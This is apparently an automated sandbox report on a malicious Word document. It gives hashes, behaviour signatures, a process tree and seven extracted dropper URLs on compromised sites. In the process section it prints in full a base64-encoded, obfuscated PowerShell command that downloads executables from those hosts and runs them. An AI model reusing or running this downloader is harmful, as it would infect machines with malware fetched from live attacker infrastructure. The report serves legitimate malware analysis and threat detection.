Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 21:39

General

  • Target

    68b985b0b37701b37d757851bc7e5321_JaffaCakes118.doc

  • Size

    158KB

  • MD5

    68b985b0b37701b37d757851bc7e5321

  • SHA1

    02ba285e940b24ebb495f75eca9afb0cc36c068f

  • SHA256

    77b35ef953d16224dfb90e0c534ce30f48b16723738498a0cc61dcf274f4bcc9

  • SHA512

    8672fd3829d99843ecf56a1f29d99eedf4311baef01054ad92af594dbb2f08afbb4f4db8b83613c4214c6495f1a7840d43957c9428e83984e21b8cd38282907a

  • SSDEEP

    1536:a0a0Grdi1Ir77zOH98Wj2gpngd+a92g8fx5EvGtaRWfjPYKwA0suw+2lrsSh:WrfrzOH98ipg6+4rs+

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://zcomunicacion.com/wp-admin/Z/

exe.dropper

http://cooldoggraphics.com/wp-content/Pge/

exe.dropper

http://canyonplastering.com/wp-content/ZWX/

exe.dropper

https://stochile.com/sto/PKP/

exe.dropper

http://voxdream.com/wp-includes/rd/

exe.dropper

https://www.valetourvirtual.com/vapor/mp/

exe.dropper

http://z.89fk.top/user/e/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\68b985b0b37701b37d757851bc7e5321_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABYAGMAcQB4AGQAYgBrAD0AKAAoACcATQB2ACcAKwAnAHYAJwApACsAJwBpADcAJwArACcAMABkACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgBWADoAVQBTAGUAcgBQAFIATwBmAGkAbABFAFwAYwB3AFIAMAByAHoAegBcAG4ASwBsAFgANABtAFQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIAZQBDAHQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAHUAYABSAGkAYABUAHkAYABwAFIAbwB0AG8AQwBPAGwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAnACkAKwAnADEAMgAnACsAJwAsACcAKwAoACcAIAB0AGwAcwAnACsAJwAxACcAKwAnADEAJwApACsAJwAsACAAJwArACgAJwB0AGwAJwArACcAcwAnACkAKQA7ACQAVgBrAGkAagA4ADMAYQAgAD0AIAAoACgAJwBKACcAKwAnAGkAbABmACcAKQArACcAZwAnACsAJwBrADkAJwApADsAJABZADMAeQAxAHUAbABuAD0AKAAoACcAVAAnACsAJwBuAG4ANgAnACkAKwAoACcAbQBuACcAKwAnADUAJwApACkAOwAkAFAAeQBiAGcAYQA2ADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwA2AGUAJwArACcARQBDACcAKQArACgAJwB3ACcAKwAnAHIAMAAnACkAKwAoACcAcgB6AHoANgBlAEUATgBrACcAKwAnAGwAJwArACcAeAAnACsAJwA0ACcAKQArACgAJwBtAHQANgAnACsAJwBlAEUAJwApACkAIAAgAC0AYwByAEUAcABMAGEAYwBFACAAKABbAGMASABhAFIAXQA1ADQAKwBbAGMASABhAFIAXQAxADAAMQArAFsAYwBIAGEAUgBdADYAOQApACwAWwBjAEgAYQBSAF0AOQAyACkAKwAkAFYAawBpAGoAOAAzAGEAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEkAeABzADcAZQByAHAAPQAoACgAJwBFACcAKwAnAGEAawB2ACcAKQArACgAJwBhAG4AJwArACcAegAnACkAKQA7ACQATgBlAHIAYQBsAGUAaQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgB3AEUAYgBjAGwASQBlAG4AdAA7ACQAUwBwADIAcAB0AGUAaAA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAOgAnACsAJwAvAC8AegBjAG8AJwApACsAJwBtAHUAJwArACcAbgBpACcAKwAnAGMAJwArACcAYQAnACsAJwBjACcAKwAoACcAaQBvACcAKwAnAG4AJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AHAAJwApACsAJwAtACcAKwAoACcAYQBkACcAKwAnAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwBaACcAKwAnAC8AKgBoACcAKQArACgAJwB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG8AbAAnACkAKwAnAGQAbwAnACsAKAAnAGcAZwByAGEAJwArACcAcAAnACsAJwBoAGkAYwAnACsAJwBzACcAKwAnAC4AYwBvAG0AJwApACsAJwAvACcAKwAoACcAdwBwAC0AJwArACcAYwBvACcAKwAnAG4AdAAnACkAKwAnAGUAJwArACgAJwBuAHQALwBQACcAKwAnAGcAJwApACsAJwBlACcAKwAoACcALwAqAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoALwAnACsAJwAvAGMAJwApACsAKAAnAGEAJwArACcAbgB5ACcAKQArACcAbwBuACcAKwAnAHAAJwArACgAJwBsAGEAcwAnACsAJwB0ACcAKwAnAGUAcgBpACcAKwAnAG4AZwAuAGMAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGMAJwApACsAKAAnAG8AJwArACcAbgB0AGUAbgB0ACcAKQArACgAJwAvAFoAVwBYAC8AKgAnACsAJwBoAHQAJwApACsAJwB0ACcAKwAoACcAcABzACcAKwAnADoALwAvAHMAJwApACsAJwB0AG8AJwArACcAYwAnACsAKAAnAGgAJwArACcAaQBsAGUAJwApACsAJwAuAGMAJwArACcAbwBtACcAKwAoACcALwBzACcAKwAnAHQAbwAvACcAKQArACcAUABLACcAKwAoACcAUAAvACcAKwAnACoAaAB0AHQAJwApACsAJwBwACcAKwAnADoALwAnACsAKAAnAC8AdgAnACsAJwBvACcAKwAnAHgAZAByAGUAJwApACsAKAAnAGEAbQAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwAnACkAKwAoACcAcAAtAGkAJwArACcAbgBjACcAKwAnAGwAdQBkACcAKQArACgAJwBlAHMAJwArACcALwByAGQALwAqACcAKQArACcAaAB0ACcAKwAnAHQAJwArACgAJwBwAHMAOgAnACsAJwAvAC8AdwAnACkAKwAoACcAdwB3AC4AdgAnACsAJwBhAGwAJwApACsAKAAnAGUAdABvACcAKwAnAHUAJwApACsAKAAnAHIAJwArACcAdgBpAHIAJwApACsAJwB0ACcAKwAoACcAdQBhACcAKwAnAGwALgBjAG8AbQAvAHYAYQAnACsAJwBwAG8AcgAvAG0AcAAnACsAJwAvACcAKQArACgAJwAqAGgAdAAnACsAJwB0AHAAJwApACsAJwA6AC8AJwArACcALwAnACsAJwB6ACcAKwAnAC4AJwArACgAJwA4ADkAZgAnACsAJwBrAC4AdABvACcAKQArACgAJwBwACcAKwAnAC8AdQAnACkAKwAnAHMAZQAnACsAJwByAC8AJwArACcAZQAnACsAJwAvACcAKQAuACIAUwBQAGAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABEAHUAegBsAG8AdQBrAD0AKAAnAEcAJwArACgAJwBjACcAKwAnAHIAcwAnACkAKwAoACcAdgAnACsAJwBqADkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABCAG4AZQBwADMAeABpACAAaQBuACAAJABTAHAAMgBwAHQAZQBoACkAewB0AHIAeQB7ACQATgBlAHIAYQBsAGUAaQAuACIAZABvAGAAVwBOAEwAYABvAEEARABGAGkAbABFACIAKAAkAEIAbgBlAHAAMwB4AGkALAAgACQAUAB5AGIAZwBhADYAMAApADsAJABLAGoANQB1ADQAYwAyAD0AKAAnAEoAJwArACcAZAAnACsAKAAnAHQAdABiADQAJwArACcAcwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABQAHkAYgBnAGEANgAwACkALgAiAGwAYABFAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA3ADgAMgA5ACkAIAB7AC4AKAAnAEkAbgAnACsAJwB2AG8AawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFAAeQBiAGcAYQA2ADAAKQA7ACQAVAB6ADMAegBzAHkAMwA9ACgAKAAnAEkAJwArACcAeABjACcAKQArACgAJwBfACcAKwAnADgAXwA5ACcAKQApADsAYgByAGUAYQBrADsAJABIAGcAMgB0AGYANQBkAD0AKAAoACcARgAwAGwAYgAnACsAJwAyACcAKQArACcAZQBxACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwA2ADYAdQBnAGwAOAA9ACgAKAAnAEIAaAAnACsAJwBxAHAAegAnACkAKwAnAHMAcQAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      a440f7c7b26ef9d75d4bc6bad851cf07

      SHA1

      b634a6b78a1898aad614a48116717fbc58708613

      SHA256

      d46db33ceb7b350035d2a8464ee4306d44bcf5c7ccc9867aec8b91bd009a9979

      SHA512

      1f5324d8eef49430cf8f2f23f8c01707f72b501bdc7085a81ab2e1fee85b0c4607ba4b9d8b9bf169617e738ff01bc0b3d032a29bd1113ccde8fbb632ee7b43f7

    • memory/2424-27-0x0000000004F30000-0x0000000005030000-memory.dmp

      Filesize

      1024KB

    • memory/2424-6-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/2424-33-0x0000000004F30000-0x0000000005030000-memory.dmp

      Filesize

      1024KB

    • memory/2424-32-0x0000000004F30000-0x0000000005030000-memory.dmp

      Filesize

      1024KB

    • memory/2424-8-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/2424-18-0x0000000004F30000-0x0000000005030000-memory.dmp

      Filesize

      1024KB

    • memory/2424-17-0x0000000004F30000-0x0000000005030000-memory.dmp

      Filesize

      1024KB

    • memory/2424-0-0x000000002F971000-0x000000002F972000-memory.dmp

      Filesize

      4KB

    • memory/2424-70-0x0000000070E1D000-0x0000000070E28000-memory.dmp

      Filesize

      44KB

    • memory/2424-2-0x0000000070E1D000-0x0000000070E28000-memory.dmp

      Filesize

      44KB

    • memory/2424-7-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/2424-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2424-51-0x0000000070E1D000-0x0000000070E28000-memory.dmp

      Filesize

      44KB

    • memory/2424-52-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

    • memory/2424-53-0x0000000004F30000-0x0000000005030000-memory.dmp

      Filesize

      1024KB

    • memory/2424-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2816-40-0x0000000001D20000-0x0000000001D28000-memory.dmp

      Filesize

      32KB

    • memory/2816-39-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

      Filesize

      2.9MB